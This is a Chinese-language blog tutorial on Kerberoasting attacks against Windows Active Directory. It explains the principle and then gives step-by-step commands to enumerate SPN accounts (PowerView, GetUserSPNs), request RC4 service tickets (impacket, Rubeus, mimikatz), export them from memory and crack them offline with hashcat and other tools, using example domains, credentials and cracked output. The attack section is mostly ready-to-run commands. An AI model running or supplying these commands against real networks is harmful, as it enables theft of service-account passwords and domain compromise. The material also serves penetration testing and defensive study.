首页 > 其他分享 >kerberoasting攻击

kerberoasting攻击

时间:2023-08-11 22:33:26浏览次数:30  
标签:hash xie 攻击 票据 SPN kerberoasting com 请求

原理

1. 攻击者通过提供一个正常的域用户密码进行身份认证。KDC再验证账户和密码的有效性后,返回一个TGT。用于ST请求

2.攻击者使用获取到的TGT请求针对制定SPN的ST。请求票据的TGS-REQ过程中,指定其支持的加密类型为RC4_HMAC_MD5(ARCFOUR-HMAC-MD5),因为加密算法相比其他加密算法比较好破解

3.攻击者的TGT是有效的,不挂提供的域账户有无访问该SPN服务的权限,KDC都会查找哪个账户在service的principalname、属性中注册了所请求的SPN,用该用户的hash以及加密算法加密ST并在TGS-REP包中返回给攻击者

4.攻击者从TGS-REP提取加密的ST。该ST是用链接到请求的SPN的账户hash加密,所以可以本地离线破解

tips:kerberoasting攻击只针对注册在用户下的SPN服务,因为及其账户的密码是随机生成的128字符,不可能爆破出来

思路

1.查询域内注册于域用户下的spn

2.请求指定SPN的ST

3.导出ST

4.对ST进行本地的爆破

攻击手法

SPN发现

1.riskySPN

是一个powershell脚本集合,专注与监测SPN相关账户是否滥用,

自动识别弱密码服务票据,根据用户账户和密码过期时间来查找最容易包含弱密码的票据

import-module .\Find-PotentiallyCrackableAccounts.ps1;

Find-PotentiallyCrackableAccounts -FullData

2.GetUserSPNs

该脚本会查询域内所有注册于用户下的SPN,包括注册于krbtgt下的kadmin/changepw。集中有powershell和vbs两种语言的脚本

#VBS的用法

cscript .\GetUserSPNs.vbs

#powershell的用法

import-Module .\GetUserSPNs.ps1

3.PowerView.ps1

该脚本是powersploit的recon目录下,用于过滤出与用户下注册了SPN的用户,包含krbtgt

import-Module .\PowerView.ps1

Get-NetUser -SPN

请求服务票据

过滤出SPN后,需要请求SPN的票据

1.impacket请求

impacket的GetUserSPNs.py可以请求注册于所有SPN的服务票据

#请求注册于用户下的所有SPN的服务票据,并利用hashcat破解的格式为TXT文件

python GetUserSPNs.py  -request -dc-ip 10.211.55.4 xie.com/hack:pass1234 -outputfile hash.txt 

#请求注册于hack下的所有SPN的服务票据,并利用hashcat破解的格式为TXT文件

Pytho GetUserSPNs.py -request -dc-ip 10.211.55.4 xie.com/hack:pass1234 -outputfile hash.txt -request-user hack

输出

servicepincipalname  name  ...

sqlserver/win7.xie.com:1433/mssql hack

2.rebues请求

rebueus中的kerberoast支持对所有用户或特定用户执行kerberoasting操作,它的原理在于先用ldap查询域内所有注册在域用户下的SPN(除了kadmin/changepw),通过发送TGS包,直接输出能使用John或hashcat爆破的hash。

#请求注册于用户下的所有SPN的服务票据,并利用john破解的格式为TXT文件

rubeus.exe kerberoast /format:john /outfile:hash.txt

#请求注册于用户下的指定SPN的服务票据,并利用john破解的格式为TXT文件

rubeus.exe kerberoast /spn:sqlserver/win7.xie.com:1433/mssql  /format:john /outfile:hash.txt

3.mimikatz请求

请求的票据将存放在内存中

#请求指定SPN的服务票据

kerberos::ask/target:sqlserver/win7.xie.com:1433/mssql

导出服务票据

有的工具可以直接将票据打印出来保存为文件,而有的工具会将票据保存在内存中。

对于保存在内存中的票据可以使用工具将其从内存中导出

1.查看内存的票据

首先查看内存中的票据

#cmd窗口

klist

#mimikatz窗口
kerberos::list

2.使用mimikatz导出内存票据

mimikatz.exe "kerberos::list /export" "exit"

mimikatz同目录会导出有一个kribi的票据文件

3.使用帝国empire导出票据

empire下的invoke-kerberoast.ps1将内存中的票据以hashcat或john方式输出。

import-module .\invoke-kerberoast.ps1

invoke-kerberoast -outputformat hashcat

离线破解服务票据

通过前面获得的.kirbi,hashcat,john直接破解的文件

1.kerberoast

该工具的tgsrepcrack.py脚本可以对mimikatz导出的.kirbi格式票据进行爆破

python2 tgsrepcrack.py pass.txt [email protected]~1433~mssql-xie.com.kirbi

输出found password for ticket 0:p@ss1234 file: [email protected]~1433~mssql-xie.com.kirbi

2.tgscrack

现将.kirbi转换成该工具的破解格式,通过go语言脚本指定密码文件进行爆破。

pytnon2 extractServiceTicketParts.py [email protected]!1433!mssql-xie.com.kirbi >hash.txt

go run tgscrack.go -hashfile hash.txt -wordlist pass.txt

3.hashcat

hashcat -m 13100 hash.txt pass.txt --force

标签:hash,xie,攻击,票据,SPN,kerberoasting,com,请求
From: https://www.cnblogs.com/lisenMiller/p/17624069.html

相关文章

  • 黑魂223 重攻击按钮
    打开ActorController脚本,增加下列代码:如果按的是右手重攻击就会执行右手重攻击,否则就是左手重攻击;如果左手没有持盾,那左手就执行重攻击,否则就进行盾反。 ......
  • 安装宝塔上传网站后经常被攻击被挂马,怎么防护呢?
    安装宝塔上传网站后经常被攻击被挂马,怎么防护呢?最近很多人出现网站被挂马,被攻击,被黑的情况,仔细一问,发现很多人安装个宝塔后,啥防护都没有,啥安全措施也没有弄,这无疑是降低了安全防护。解决办法:安装宝塔后,安装一个下面这个防护, 这样就可以给你的服务器和网站添加一道防火墙,虽......
  • 缓慢的http拒绝服务攻击
    详细描述缓慢的HTTP拒绝服务攻击是一种专门针对于Web的应用层拒绝服务攻击,攻击者操纵网络上的肉鸡,对目标Web服务器进行海量HTTP请求攻击,直到服务器带宽被打满,造成了拒绝服务。慢速HTTP拒绝服务攻击经过不断的演变和发展,主要有三种攻击类型,分别是Slowheaders、Slowbody、Slowr......
  • https:443端口经常被攻击怎办 103.60.164.x
    443端口一般是加证书的端口,证书就是ssl证书加密能在一定程度上防止网站被劫持。就是网页浏览的端口,这个端口主要是针对HTTPS服务的。从本质上来说https服务就是能够提供加密以及通过相关的安全端口进行信息传输的HTTP。我们知道有一些网站是对安全性要求特别高的,比如涉及到银行与证......
  • [PWN之路]堆攻击那些事儿
    原文:https://www.freebuf.com/articles/endpoint/371095.html0x00前言根据某大佬所说,pwn之路分为栈,堆,和内核。当前,如果你看到这个文章,说明你已经达到一个正在前往pwn深处的分水岭。堆的魔力和魅力实际上远远大于栈,希望我的文章能够帮助到入门的同学们。请注意,如果一些东西看不......
  • ICMP协议的作用,Ping of Death攻击的原理是什么?
    ICMP是“InternetControlMessageProtocol”(Internet控制消息协议)的缩写。它是TCP/IP协议族的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传......
  • 如何使用WAF防止DDoS攻击?
    DDoS攻击已经成为互联网领域中最严重的安全威胁之一。无论是企业还是个人网站,都面临着DDoS攻击的风险。为了保护自己的网站安全,并避免DDoS攻击对自身造成的危害,采用WAF防止DDoS攻击是非常必要的。WAF是Web应用程序防火墙,是一种网络安全技术,可以在应用程序层面防御攻击,包括DDoS攻击......
  • 服务器被攻击了怎么办?
    服务器被攻击是无法避免的,但是我们能通过做好防护措施,提高服务器的安全性,降低被攻击的几率。那么当服务器已经被攻击了,怎样才能降低损失呢?该怎样补救?断开网络全部的攻击都来自于网络,因而,在知道系统正遭到网络黑客的攻击后,首先要做的便是断掉服务器的网络连接,那样除开能断开攻......
  • 中间人攻击 http与https的区别
    由一个视频引发的问题 https://v.douyin.com/iJJ9n2r7/ 中间人攻击  由于HTTP本身不具备加密的功能,所以也无法做到对通信整体(使用HTTP协议通信的请求和相应的内容)进行加密,即HTTP报文使用明文(未经过加密的报文)方式发送。(对应于信件使用的文字不加密)抓包:可以得到cookie......
  • web渗透测试(15):XML攻击
    在本节中,将详细介绍与XML相关的攻击。这些类型的攻击在Web服务和使用XPath从XML文件中检索配置设置的应用程序中很常见(例如,根据提供的组织名称了解他们需要使用哪些后端来验证用户)。 Example1<?phprequire_once("../header.php");?>Hello<?php$xml=simplexml_load_......